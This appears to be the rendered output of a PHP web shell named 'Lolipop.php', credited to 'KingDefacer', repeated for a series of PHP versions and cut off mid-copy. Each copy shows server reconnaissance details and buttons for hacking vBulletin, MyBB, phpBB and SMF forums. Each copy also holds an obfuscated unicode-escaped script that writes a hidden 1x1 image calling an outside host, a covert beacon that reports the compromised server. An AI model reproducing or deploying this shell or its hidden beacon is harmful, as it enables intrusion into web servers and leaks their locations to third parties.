</table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.2.5
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.2.5</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.2.4
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.2.4</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.2.3
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.2.3</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.2.2
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.2.2</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.2.1
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.2.1</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.2.0
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.2.0</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.1.33
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.1.33</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.1.32
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.1.32</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.1.31
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.1.31</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.1.30
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.1.30</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.1.29
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.1.29</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.1.28
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.1.28</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 